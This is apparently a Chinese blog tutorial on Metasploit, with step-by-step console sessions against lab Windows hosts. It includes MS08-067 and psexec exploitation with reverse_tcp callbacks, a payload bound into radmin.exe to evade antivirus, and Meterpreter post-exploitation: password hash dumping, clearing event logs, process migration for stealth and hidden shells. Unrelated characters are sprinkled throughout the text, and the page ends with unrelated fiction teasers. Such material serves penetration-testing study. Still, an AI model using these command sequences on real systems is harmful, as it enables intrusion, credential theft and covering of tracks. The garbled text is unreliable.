Metasploit

1.滲透測試框架

默認的數(shù)據(jù)庫為:postgresql
端口為:5432
初始化數(shù)據(jù)庫
msfdb reinit

2.技術(shù)功能模塊(不是流程模塊)
程序主目錄
/usr/share/metasploit-framework/
有6個模塊
Exploits:利用系統(tǒng)漏洞進行攻擊的動作罗捎,此模塊對應(yīng)的每一個具體漏洞的攻擊方法(主動具温、被動)
Payload:成功exploit之后珠闰,真正在目標系統(tǒng)中執(zhí)行的代碼指令

  • shellcode或系統(tǒng)命令
  • 三種payload:/usr/share/metasploit-framework/modules/payload/
  • single:all-in-one
  • stager:目標計算器內(nèi)存有限時,先傳輸一個較小的payload用于建立連接
  • stages:利用stager建立的連接下載的后續(xù)payload
  • stager占卧、stages都有多種類型瓣窄,適用于不同場景
  • shellcode 是payload的一種溢吻,由于其建立正向/反向shell而得名

msf架構(gòu)

技術(shù)功能模塊(不是流程模塊)

  • Auxiliary:執(zhí)行信息收集乌庶、枚舉、指紋探測左痢、掃描等功能輔助模塊(沒有payload的exploit模塊)
  • Encoders:對payload進行加密靡羡,躲避AV檢查的模塊
  • Nope:提高payload穩(wěn)定性及維持大小

基本的使用

使用前先升級:msfupdate
初始化數(shù)據(jù)庫:smfdb reinit
Msfcli使用接口
Msfconsole使用接口

  • 最流行的接口
  • 幾乎可以使用全部MSF功能
  • 控制臺命令支持TAB自動補齊
  • 支持外部命令的執(zhí)行(系統(tǒng)命令等)
  • 點擊鼠標啟動 /msfconsole -h -q -r -v /exit
  • help / ? / help vulns

msf控制臺命令

  • banner :顯示banner信息
  • color:顏色的區(qū)分
  • connect -h 可以作為一個客戶端去連接別人,類似于nc差不多俊性,支持SSL略步,代理,UDP

show auxiliary / exploits / payload / encoders / nops

search ms10-046 搜索內(nèi)容太多定页,可以使用下面的語句進行快速搜索

  • search name:mysql
  • search cve:2016
  • search type:auxiliary

08-067漏洞利用

search 08_067    查找模塊
use exploit/windows/smb/ms08_067_netapi  進入模塊
info 查看模塊當前模塊的基本信息
show options 設(shè)置選項
show targets  制定類型
show advanced 設(shè)置高級的參數(shù)
show missing    設(shè)置需要配置的參數(shù)
set rhost 192.168.11.118 設(shè)置要攻擊的IP
check 檢查漏洞是否真的存在
back 返回上一層

數(shù)據(jù)庫斷開與連接

db_disconnect 斷開當前數(shù)據(jù)庫的連接
cd /usr/share/metasploit-framework/config 默認的數(shù)據(jù)庫連接地址
db_connect msf3:msf@localhost/msf3 數(shù)據(jù)庫連接

db_nmap

>db_nmap 192.168.1.1 調(diào)用namp掃描工具趟薄,并保存到PostgreSQL里面
hosts    查看數(shù)據(jù)庫里面的nmap掃描記錄
hosts 192.168.1.1  篩選其中一條nmap記錄
services  查看開放的端口
>services -S 3306  查看某個特定開放的端口
 services -c port,state -p 1-200   查看端口和狀態(tài)為開放的IP段1-200的存活ip

mysql_login模塊使用

search mysql_login     搜索這個漏洞利用輔助模塊
use auxiliary/scanner/mysql/mysql_login  進入這個輔助模塊
show options   設(shè)置
set blank_passwords true   開啟密碼為空的選項
set rhosts 192.168.11.120  攻擊IP
set username root  用戶名
exploit  開始
creds   查看利用成功的IP

數(shù)據(jù)庫導(dǎo)入

db_import /root/12.xml

unset rhosts 取消剛剛設(shè)置的參數(shù)
setg rhosts 1.1.1.1 全局變量,把所有要設(shè)置IP的參數(shù)全部都設(shè)置成1.1.1.1
unsetg rhosts 取消全局變量

Exploit模塊

RHOST遠程主機典徊,LHOST本地主機

1.active杭煎,受害者的服務(wù)存在漏洞恩够,攻擊者主動向受害者發(fā)送漏洞利用代碼。

實例:exploit/windows/smb/psexec

適用場景:攻擊者獲取到了受害者的賬號和密碼岔帽,但是受害者機器上沒有開放Telnet玫鸟,遠程桌面等服務(wù)导绷。
注:如果想該漏洞利用成功犀勒,需要關(guān)閉用戶賬號控制設(shè)置(UAC)


TIM圖片20180131162858.png
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set rhost 192.168.80.150
msf exploit(psexec) > set smbuser coler
msf exploit(psexec) > set smbpass 123456
msf exploit(psexec) > set payload windows/shell/reverse_tcp
msf exploit(psexec) > set lhost 192.168.80.163
msf exploit(psexec) > exploit -j
msf exploit(handler) > sessions -u 1 將shell提升到meterpreter類型的shell

上面攻擊都是針對存在漏洞的服務(wù)器程序,提供服務(wù)器端的程序

2.passive妥曲,受害者的客戶端程序存在漏洞贾费,攻擊者誘使受害者使用存在漏洞的客戶端程序,訪問自己構(gòu)建好的 存在漏洞利用代碼的服務(wù)端程序檐盟。

實例:exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize

msf exploit(ms07_017_ani_loadimage_chunksize) > set srvhost 192.168.80.163

msf exploit(ms07_017_ani_loadimage_chunksize) > set payload windows/shell/reverse_tcp

msf exploit(ms07_017_ani_loadimage_chunksize) > set lhost 192.168.80.163

msf exploit(ms07_017_ani_loadimage_chunksize) > exploit

在存在漏洞的IE瀏覽器上訪問http://192.168.80.163/褂萧,攻擊者會得到受害者的shell。

payload模塊

msf > use payload/windows/shell_bind_tcp

msf payload(windows/shell_bind_tcp) > generate -b '\x00'    過濾壞字符(實際是使用encoders模塊將壞字符編碼)

msf payload(windows/shell_bind_tcp) >   generate -b '\x00\xff' -t exe -i 5 -k -x /usr/share/windows-binaries/radmin.exe -f 123.exe   將payload綁定到radmin.exe中

在靶機上運行123.exe葵萎,然后在攻擊機上用nc連接靶機的4444端口导犹,會獲得靶機的shell。

root@kali:~# nc 192.168.11.122 4444

注:有時將綁定payload的執(zhí)行程序拷貝到物理機上羡忘,會被物理機的殺毒軟件殺掉谎痢,可以先開啟msf的Apache服務(wù),將exe程序放在/var/www/html目錄下卷雕,然后通過虛擬機直接訪問下載节猿。

root@kali:~# service apache2 start

root@kali:~# cp 123.exe /var/www/html/

Meterpreter

  1. 高級、動態(tài)漫雕、可擴展的payload
  • 基于meterpreter上下文利用更多漏洞發(fā)起攻擊
  • 后滲透測試階段一站式操作界面

2.完全基于內(nèi)存的DLL注入式payload(不寫硬盤)

  • 注入到系統(tǒng)一個正常的進程里面(桌面進程等(explorer.exe))隱蔽性很好
  • 利用tls隧道進一步加載后續(xù)擴展模塊(避免網(wǎng)絡(luò)取證 )

Meterpreter基本命令
例子:ms08_067

search ms08_067
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > show options 
msf exploit(windows/smb/ms08_067_netapi) > set rhost 192.168.11.114
msf exploit(windows/smb/ms08_067_netapi) > set target 34
msf exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) >set lhost 192.168.11.124
msf exploit(windows/smb/ms08_067_netapi) >msf exploit(windows/smb/ms08_067_netapi) >exploit  -j
sessions -l
---------------------------------------------------------------------------------------------------
msf exploit(windows/smb/ms08_067_netapi) >sessions -i 2   進入meterpreter類型的shell
meterpreter > background  退出到msf命令提示符下滨嘱,session一直都在
meterpreter > lpwd  等價于在kali上輸入pwd
meterpreter > lcd /etc  等價于在kali上輸入cd /etc
meterpreter >edit  aaa.txt  編輯文件 
meterpreter > getuid  查看權(quán)限
meterpreter > bgrun hashdump 獲取目標主機的hash
meterpreter > bgrun vnc 開啟圖形化的遠程管理
--------------------------------------------------------------------------------------------------------
meterpreter > clearev  清除日志
meterpreter > download OEWABLog.txt  下載目標主機上面的文件
meterpreter > upload /usr/share/windows-binaries/nc.exe c:\\windows\\system32 上傳nc到目標主機上面,注意要使用2個反斜杠
meterpreter > dir system32\\nc.exe   查看是否上傳成功
meterpreter > execute -f cmd.exe -i -H  獲得目標主機的shell浸间,-i交互模式太雨,-H隱藏
---------------------------------------------------------------------------------------------------------
meterpreter > getuid  查看當前賬號
meterpreter > getsystem  如果獲取的不是system權(quán)限,強制性的獲取成system
meterpreter > getprivs 查看有哪些操作系統(tǒng)的權(quán)限
meterpreter > getpid    查看注入到那個進程里面了
Current pid: 1100
meterpreter > ps    查看這個1100是什么進程
meterpreter > migrate 1624   把1100的進程遷移到1624(桌面的進程中來)這樣做的目的是:隱蔽性比較好魁蒜,查看進程時躺彬,是一個正常的進程
-----------------------------------------------------------------------------------------------------------
操作系統(tǒng)中常用的命令:
meterpreter > hashdump    
meterpreter >  run post/windows/gather/smart_hashdump
上面兩個都是獲取hash的命令,第二個調(diào)用模塊梅惯,第一個自身的命令宪拥,結(jié)果都是一樣的
meterpreter > sysinfo    查看系統(tǒng)信息
meterpreter > kill 1100   結(jié)束進程
meterpreter > show_mount   查看目標系統(tǒng)主機掛載的盤
----------------------------------------------------------------------------------------------------------
網(wǎng)絡(luò)中的命令:
terpreter > route   查看當前路由表
terpreter > arp
terpreter > netstat
terpreter > ipconfig和ifconfig  在meterpreter都可以使用
-------------------------------------------------------------------------------------------------------
meterpreter > idletime   目標操作系統(tǒng)空閑多長時間

Meterpreter python擴展

2015年11月份,來自社區(qū)的貢獻
無需運行環(huán)境铣减,在客戶端運行原生python代碼
load python

  • help
  • meterpreter > python_execute "print('hello world')"

msf 信息收集

一她君、主動信息收集

1、Nmap掃描

db_nmap -sV 192.168.1.1

2葫哗、search arp

msf > use auxiliary/scanner/discovery/arp_sweep  進入arp_sweep 這個模塊
msf auxiliary(scanner/discovery/arp_sweep) > show options    查看需要配置的參數(shù)
msf auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.11.0/24 設(shè)置目標主機的IP段
msf auxiliary(scanner/discovery/arp_sweep) > set threads 20 設(shè)置線程為20
msf auxiliary(scanner/discovery/arp_sweep) > exploit/run  開始掃描

3缔刹、search portscan

msf > use auxiliary/scanner/portscan/syn  進入這個掃描的模塊
msf auxiliary(scanner/portscan/syn) > show options   查看需要配置的參數(shù)
msf auxiliary(scanner/portscan/syn) > set ports 80   設(shè)置掃描的端口
msf auxiliary(scanner/portscan/syn) > set rhosts 192.168.11.0/24 設(shè)置目標主機的IP段
msf auxiliary(scanner/portscan/syn) > set threads 20  設(shè)置線程
msf auxiliary(scanner/portscan/syn) > show options  再次查看需要設(shè)置的參數(shù)
msf auxiliary(scanner/portscan/syn) > exploit  運行

4球涛、UDP掃描

msf > use auxiliary/scanner/discovery/udp_sweep 進入模塊
msf auxiliary(scanner/discovery/udp_sweep) > show options  查看需要配置的參數(shù)
msf auxiliary(scanner/discovery/udp_sweep) > set rhosts 192.168.1.100-192.168.1.200  設(shè)置目標主機的IP段
msf auxiliary(scanner/discovery/udp_sweep) > run 開始掃描

二、被動信息收集
密碼嗅探

  • 支持從pcap抓包文件中提取密碼
  • 功能類似于dsniff
  • 目前支持pop3校镐、imap亿扁、ftp、Http GET協(xié)議
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末鸟廓,一起剝皮案震驚了整個濱河市从祝,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌引谜,老刑警劉巖牍陌,帶你破解...
    沈念sama閱讀 217,406評論 6 503
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異员咽,居然都是意外死亡毒涧,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,732評論 3 393
  • 文/潘曉璐 我一進店門贝室,熙熙樓的掌柜王于貴愁眉苦臉地迎上來契讲,“玉大人,你說我怎么就攤上這事滑频〖衿” “怎么了?”我有些...
    開封第一講書人閱讀 163,711評論 0 353
  • 文/不壞的土叔 我叫張陵误趴,是天一觀的道長霹琼。 經(jīng)常有香客問我,道長凉当,這世上最難降的妖魔是什么枣申? 我笑而不...
    開封第一講書人閱讀 58,380評論 1 293
  • 正文 為了忘掉前任,我火速辦了婚禮看杭,結(jié)果婚禮上忠藤,老公的妹妹穿的比我還像新娘。我一直安慰自己楼雹,他們只是感情好模孩,可當我...
    茶點故事閱讀 67,432評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著贮缅,像睡著了一般榨咐。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上谴供,一...
    開封第一講書人閱讀 51,301評論 1 301
  • 那天块茁,我揣著相機與錄音,去河邊找鬼。 笑死数焊,一個胖子當著我的面吹牛永淌,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播佩耳,決...
    沈念sama閱讀 40,145評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼遂蛀,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了干厚?” 一聲冷哼從身側(cè)響起李滴,我...
    開封第一講書人閱讀 39,008評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎萍诱,沒想到半個月后悬嗓,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體污呼,經(jīng)...
    沈念sama閱讀 45,443評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡裕坊,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,649評論 3 334
  • 正文 我和宋清朗相戀三年,在試婚紗的時候發(fā)現(xiàn)自己被綠了燕酷。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片籍凝。...
    茶點故事閱讀 39,795評論 1 347
  • 序言:一個原本活蹦亂跳的男人離奇死亡,死狀恐怖苗缩,靈堂內(nèi)的尸體忽然破棺而出饵蒂,到底是詐尸還是另有隱情,我是刑警寧澤酱讶,帶...
    沈念sama閱讀 35,501評論 5 345
  • 正文 年R本政府宣布退盯,位于F島的核電站,受9級特大地震影響泻肯,放射性物質(zhì)發(fā)生泄漏渊迁。R本人自食惡果不足惜,卻給世界環(huán)境...
    茶點故事閱讀 41,119評論 3 328
  • 文/蒙蒙 一灶挟、第九天 我趴在偏房一處隱蔽的房頂上張望琉朽。 院中可真熱鬧,春花似錦稚铣、人聲如沸箱叁。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,731評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽耕漱。三九已至,卻和暖如春抬伺,著一層夾襖步出監(jiān)牢的瞬間螟够,已是汗流浹背。 一陣腳步聲響...
    開封第一講書人閱讀 32,865評論 1 269
  • 我被黑心中介騙來泰國打工沛简, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留齐鲤,地道東北人斥废。 一個月前我還...
    沈念sama閱讀 47,899評論 2 370
  • 正文 我出身青樓,卻偏偏與公主長得像给郊,于是被迫代替她去往敵國和親牡肉。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 44,724評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 一淆九、MSF終端命令 show exploits 列出metasploit框架中所有的滲透攻擊模塊 show pay...
    Kaen閱讀 3,252評論 0 1
  • 轉(zhuǎn)自:https://thief.one/2017/08/01/1/?hmsr=toutiao.io&utm_me...
    鯨息_Leon閱讀 7,387評論 0 7
  • 一 漏洞及漏洞發(fā)掘方法 漏洞统锤,是指在硬件、軟件炭庙、協(xié)議實現(xiàn)或系統(tǒng)安全策略上存在缺陷饲窿,攻擊者能夠在未授權(quán)的情況下對系統(tǒng)...
    kaitoulee閱讀 15,219評論 0 30
  • show exploits列出metasploit框架中的所有滲透攻擊模塊。show payloads列出meta...
    流弊的小白閱讀 1,853評論 0 13
  • 在幾許剎那的時間里焕蹄,我以為自己可以逾雄,順著這股沖動的熱去找你。不去想見面的地點腻脏,不在乎你我的距離鸦泳,甚至連見面時和你...
    一只貓Zed閱讀 169評論 0 0